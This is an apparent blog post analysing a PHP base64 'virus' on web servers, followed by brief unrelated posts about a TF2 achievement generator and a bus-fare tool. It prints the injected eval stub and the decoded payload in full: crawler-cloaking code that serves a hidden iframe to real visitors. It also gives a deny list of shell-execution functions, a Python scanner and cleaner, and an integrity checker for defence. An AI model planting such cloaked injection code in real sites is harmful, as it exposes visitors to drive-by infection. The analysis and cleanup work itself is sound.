PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";      // apparently a password hash gating the backdoor
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7";  // deflated + base64-encoded second stage (truncated here)
    eval(base64_decode($script));                         // $script is not defined in the snippet as shown
    @eval(gzinflate(base64_decode($virusaworm)));         // decode, inflate and run the payload; @ hides errors
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code, i.e. what that base64 string decodes to:

<?php
error_reporting(0);                       // hide any PHP error from the visitor
$bot = FALSE ;
// user-agent substrings of crawlers and scanners that must not see the iframe
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
// IP ranges (first address, last address) of crawlers the payload wants to avoid
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
// %u turns the signed ip2long() result into an unsigned value on 32-bit builds
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
    // only visitors that don't look like a crawler get the off-screen 2x2 iframe
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <IFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></IFRAME>
        </div>';
}

So every page carrying this stub serves an invisible, off-screen iframe, but only to visitors that don't look like a crawler (by user agent or by source IP). That cloaking keeps the injected frame out of search-engine caches and scanner results, which is why a site can stay listed as clean while real visitors are hit.
The page loaded in the iframe hosts the exploit that infects the visitor's browser.

How do we get rid of it?

First take the site offline for everyone but yourself, so nobody is served the iframe while you clean up and the attacker can't reach any backdoor in the meantime. In your webroot put a .htaccess file with the following content (Apache 2.2 syntax; on Apache 2.4 the equivalent directive is Require local):
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php locally, i.e. through the web server from the machine itself, because the .htaccess above only admits 127.0.0.1. Delete the cleaner again afterwards; it is itself a script anyone could call. Delete the dropper file (the one with $auth_pass and $virusaworm) outright rather than cleaning it, and replace any file you can't vouch for from a known-good copy or from version control.

After you've done all the steps to prevent this from happening again, delete the .htaccess file.
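If you would rather see what the cleaner has to do than trust a tool blindly, here is an added example (not the page's code and not Trinetra) that covers both halves of the post so far: it finds the two stub shapes shown above, decodes the payload (base64, and raw DEFLATE for the gzinflate variant) so you can read it, flags the cloaking strings from the decoded code, and strips the stubs from a file while keeping a .infected.bak copy. The sample infected file at the bottom is constructed for the demo, not a real capture; the hint strings and file-name suffix are my choices.

```python
"""Finder/cleaner for the eval(base64_decode(...)) stubs shown above.
Added example: not the page's code and not Trinetra. It locates the injected
statement in PHP sources, decodes the payload so you can read it, and strips
the statement, keeping a .infected.bak copy of the original file."""
import base64
import re
import zlib
from pathlib import Path

_B64 = r"['\"]\s*([A-Za-z0-9+/=\s]+?)\s*['\"]"
# Stub shape 1 (the per-file infection): eval(base64_decode('...'));
STUB_PLAIN = re.compile(r"@?eval\s*\(\s*base64_decode\s*\(\s*" + _B64 + r"\s*\)\s*\)\s*;?", re.I)
# Stub shape 2 (the dropper): eval(gzinflate(base64_decode('...')));
STUB_GZ = re.compile(r"@?eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*" + _B64
                     + r"\s*\)\s*\)\s*\)\s*;?", re.I)
# Strings the decoded cloaking payload on the page contains.
CLOAKING_HINTS = ("HTTP_USER_AGENT", "REMOTE_ADDR", "iframe", "error_reporting(0)")


def decode_payload(b64: str, inflate: bool) -> str:
    """Reverse base64 and, for the gzinflate variant, raw DEFLATE."""
    raw = base64.b64decode("".join(b64.split()))
    if inflate:
        raw = zlib.decompress(raw, wbits=-15)  # PHP gzinflate() is raw DEFLATE
    return raw.decode("utf-8", errors="replace")


def find_injections(src: str) -> list:
    """One record per stub found in a PHP source string, in file order."""
    hits = []
    for pattern, inflate in ((STUB_GZ, True), (STUB_PLAIN, False)):
        for m in pattern.finditer(src):
            try:
                payload = decode_payload(m.group(1), inflate)
            except (ValueError, zlib.error) as exc:  # bad base64 or bad deflate
                payload = f"<undecodable: {exc}>"
            hits.append({"offset": m.start(), "stub": m.group(0)[:50], "payload": payload,
                         "cloaking": any(h in payload for h in CLOAKING_HINTS)})
    return sorted(hits, key=lambda h: h["offset"])


def clean_source(src: str) -> tuple:
    """Strip the stubs and report how many were removed. A stub sitting in its
    own '<?php ... ?>' block goes together with its tags, so no stray open tag
    is left in front of the application's own '<?php'."""
    removed = 0
    for pattern in (STUB_GZ, STUB_PLAIN):
        own_block = re.compile(r"<\?php\s*" + pattern.pattern + r"\s*\?>[ \t]*\r?\n?", re.I)
        src, n = own_block.subn("", src)
        removed += n
        src, n = pattern.subn("", src)
        removed += n
    return src, removed


def clean_file(path: Path) -> int:
    src = path.read_text(encoding="utf-8", errors="surrogateescape")
    cleaned, n = clean_source(src)
    if n:  # keep the evidence before overwriting
        path.with_name(path.name + ".infected.bak").write_text(src, encoding="utf-8", errors="surrogateescape")
        path.write_text(cleaned, encoding="utf-8", errors="surrogateescape")
    return n


def scan_tree(root: Path) -> dict:
    """Map every infected .php file under root to its injection records."""
    found = {}
    for path in sorted(root.rglob("*.php")):
        hits = find_injections(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            found[path] = hits
    return found


# Constructed sample (not a real capture), modelled on the decoded payload above.
SAMPLE_PAYLOAD = ("error_reporting(0);\n"
                  "if (strpos($_SERVER['HTTP_USER_AGENT'], 'bot') === false) {\n"
                  "    echo '<iframe src=\"http://example.org/x\" width=\"2\" height=\"2\"></iframe>';\n"
                  "}\n")


def raw_deflate(data: bytes) -> bytes:  # what PHP gzdeflate() produces
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


SAMPLE_INFECTED = (
    "<?php eval(base64_decode('" + base64.b64encode(SAMPLE_PAYLOAD.encode()).decode() + "')); ?>\n"
    "<?php\n// original application code (constructed sample)\n$greeting = 'hello';\n"
    "@eval(gzinflate(base64_decode('"
    + base64.b64encode(raw_deflate(SAMPLE_PAYLOAD.encode())).decode() + "')));\necho $greeting;\n")

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_INFECTED):
        print(hit["stub"], "(cloaking)" if hit["cloaking"] else "", "\n" + hit["payload"])
    cleaned, n = clean_source(SAMPLE_INFECTED)
    print(f"removed {n} stub(s):\n{cleaned}")
```

Run scan_tree() on the webroot first and read the decoded payloads before you let clean_file() loose: a regex cleaner only knows the two shapes shown on this page, and a file that is nothing but the dropper should be deleted, not cleaned. Whatever is left after this still needs the question answered of how the files were written in the first place (stolen FTP credentials, a writable webroot, a vulnerable plugin), otherwise the stubs are back tomorrow.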

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, exec, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, mysql_pconnect, openlog, passthru, php_uname, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system"

allow_url_include = off is what stops remote file inclusion; allow_url_fopen = off also breaks legitimate HTTP fetches through file_get_contents() and friends, so check your code before flipping it.

Two things about the disable_functions list. eval is deliberately not in it: eval() is a language construct, not a function, so disable_functions cannot block it (the same goes for include and require); Suhosin below is the way to restrict it. Names that often appear in copies of this list but are not PHP built-ins at all (fp, fput, inject_code, the phpAds_* entries, xmlrpc_entity_decode) are left out because they do nothing, and escapeshellarg/escapeshellcmd are left out because they are exactly the escaping helpers you want your code to keep calling.

Remove the functions you do need; some applications legitimately shell out with exec() or proc_open(). You can add base64_decode and gzinflate to stop the stub itself from running, but expect that to break libraries that use them for ordinary purposes.

Change your file permissions! The user the web server runs as should not be able to write to your PHP files: it is the ability to write PHP into the webroot that turns an upload into an infection. Only genuine upload directories need to be writable, and PHP execution should be switched off in those.

Install and configure Suhosin (PHP 5 only; it has no release for PHP 7 or later). It can disable eval() altogether with suhosin.executor.disable_eval, or, when eval() has to stay, blacklist (suhosin.executor.eval.blacklist) or whitelist (suhosin.executor.eval.whitelist) the functions that eval()ed code may call, so that base64_decode and gzinflate are never allowed inside eval().
In that case, even when some bot manages to upload the payload, it cannot be executed.
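None of the settings above tells you when the attacker is back. The second link under "Interesting readings" is about exactly that, so as an added example that goes beyond the page's own steps (not the page's, Trinetra's or any tool's code), this is the check I would put in cron after the cleanup: a SHA-256 baseline of the webroot, compared on every run. The watched file types and the paths in the usage comments are assumptions for the example.

```python
"""Integrity baseline for a webroot. Added example, not the page's code.
Take a baseline right after cleaning (and after every deliberate deploy);
each later run reports files that were added, removed or changed, which is
how a re-injected eval(base64_decode(...)) stub shows up before users do."""
import hashlib
import json
import sys
from pathlib import Path

# File types worth watching (an assumption for the example; extend as needed).
WATCHED = (".php", ".phtml", ".inc", ".js", ".html", ".htaccess")


def hash_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(root: Path) -> dict:
    """Relative path -> SHA-256 for every watched file under root."""
    baseline = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and (path.suffix in WATCHED or path.name in WATCHED):
            baseline[path.relative_to(root).as_posix()] = hash_bytes(path.read_bytes())
    return baseline


def diff_baseline(old: dict, new: dict) -> dict:
    """Three sorted lists: files added, removed, and changed since the baseline."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def is_clean(diff: dict) -> bool:
    return not any(diff.values())


def check_tree(root: Path, baseline_file: Path) -> dict:
    """Compare root against a saved baseline. Keep the baseline file outside
    the webroot (and not writable by the web server), or the attacker can
    simply update it along with the PHP files."""
    old = json.loads(baseline_file.read_text())
    return diff_baseline(old, build_baseline(root))


if __name__ == "__main__":
    # python integrity.py init  /var/www /var/lib/integrity/baseline.json
    # python integrity.py check /var/www /var/lib/integrity/baseline.json   (from cron)
    mode, root, baseline_file = sys.argv[1], Path(sys.argv[2]), Path(sys.argv[3])
    if mode == "init":
        baseline_file.write_text(json.dumps(build_baseline(root), indent=1, sort_keys=True))
    else:
        result = check_tree(root, baseline_file)
        for kind, paths in result.items():
            for p in paths:
                print(f"{kind}: {p}")
        sys.exit(0 if is_clean(result) else 1)
```

A non-zero exit from the cron job is the alert; wire it to mail or whatever you already monitor. Anything listed under "added" or "changed" that you didn't deploy yourself deserves the same look as the stub at the top of this post.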

 

Interesting readings

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/


Achievement generator

There used to be a very pretty achievements generator at http://teamfortress2.fr/achievements.php?eng

But apparently it broke because of some missing JavaScript and CSS files.

Using archive.org I’ve managed to get those files.

Then I crammed everything together in one HTML file 🙂

http://pastehtml.com/view/cp27dx5ly.html

Mirror: http://ict-blue.be/qwaxys/projects/TF2-achievements/

Enjoy!

PS: you can just copy the HTML and run it locally or host it yourself 😉


London: There and Back Again

I like London, great city, lots of stuff to do. But it’s not next door, so that means traveling.

I prefer traveling cheap so most of the time I use Megabus 😛 .

They’re a nice, low-budget bus company.

However their site makes it quite hard to get an overview of all the cheapest days.

So I’ve made a little tool for myself 😀


http://ict-blue.be/qwaxys/projects/megabus/